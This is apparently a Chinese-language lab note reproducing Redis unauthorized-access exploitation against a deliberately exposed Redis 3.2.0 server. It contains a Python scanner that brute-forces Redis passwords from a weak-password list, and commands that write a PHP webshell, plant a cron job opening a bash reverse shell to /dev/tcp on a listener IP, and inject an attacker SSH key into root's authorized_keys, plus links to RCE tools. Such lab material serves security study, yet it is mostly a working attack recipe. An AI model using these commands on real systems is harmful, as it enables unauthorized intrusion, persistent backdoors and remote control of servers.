redis未授权访问复现
redis未授权访问
1.环境搭建
wget http://download.redis.io/releases/redis-3.2.11.tar.gz
tar zxvf redis-3.2.11.tar.gz
cd redis-3.2.11
make
如果缺少make的话 apt install make
//上面的当我没说,我环境不允许,正在尝试centos
2.环境搭建(1)
wget http://download.redis.io/releases/redis-3.2.0.tar.gz
tar xzf redis-3.2.0.tar.gz
cd redis-3.2.0
make
vim redis.conf
bind 127.0.0.1前面加上#号 protected-mode设为no
./src/redis-server redis.conf
firewall-cmd --zone=public --remove-port=6379/tcp --permanent
firewall-cmd --reload
3.漏洞检测
#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
try:
socket.setdefaulttimeout(timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send("INFO\r\n")
result = s.recv(1024)
if "redis_version" in result:
return u"未授权访问"
elif "Authentication" in result:
for pass_ in PASSWORD_DIC:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send("AUTH %s\r\n" %(pass_))
result = s.recv(1024)
if '+OK' in result:
return u"存在弱口令,密码:%s" % (pass_)
except Exception, e:
pass
if __name__ == '__main__':
ip=sys.argv[1]
port=sys.argv[2]
print check(ip,port, timeout=10)
4.漏洞利用
4.1写webshell
redis-cli -h 192.168.164.147
config set dir /var/www/html/
config set dbfilename shell.php
set webshell "<?php phpinfo(); ?>"
save
4.2反弹shell
nc -lvnp 7999
set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save
4.3写ssh公钥
再kali上生成ssh公钥
ssh-keygen -t rsa
cat id_rsa.pub
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/AxH3PNJW2moAmp5rZn4rRpel0BNFNJx3un6aQHAp8MqyL25kC2ugDqjTYOxtAqM9MLySG4UJUn6g6aSZQqv36zh9nBxprIwMUTorxQBnwGjgkTkOVHF241nGnCRGKPMPxGfdAkj/CFd6Esk7jyzqafF6lhzy4tLh2jk2P50qhnMQei7IZigEQOW36oBSAcBD+yZ0tQekozyzg7JJ+8v2XkuCcEvI2K6gSX/29A3BkTXUS/0c4yLw6r5UVDyhcdZDc6qbeqeTyKDeMxCgwqRZV9SZOyorQtya+UUW5AifnEUREYpK4CBlpzs1ek6eE6vgRAZGoJ8BnpkvfDayku5rgqNBbjuIxfq1+nEZInD9JVLjk4hC6ZJk1pypXD2+gxQZeBL9OYOmFx3Onx5A2sqPxh/jDrfiF8s5x3wgcTUQ4BulBWp+qUuj0KjXMN/cOuaa7t2Ame3o3MIaa4axw3OEyaIzlY9V0GRYZlHUkoy5ljF5BUUoFWrm9Gf10jqDnnU= root@kali\n\n\n"
save
ssh -i id_rsa [email protected]
4.4脚本利用
https://github.com/n0b0dyCN/redis-rogue-server
https://github.com/Ridter/redis-rce
5.参考文章
https://www.cnblogs.com/bmjoker/p/9548962.html
https://www.freebuf.com/vuls/223432.html
https://blog.csdn.net/fly_hps/article/details/80937837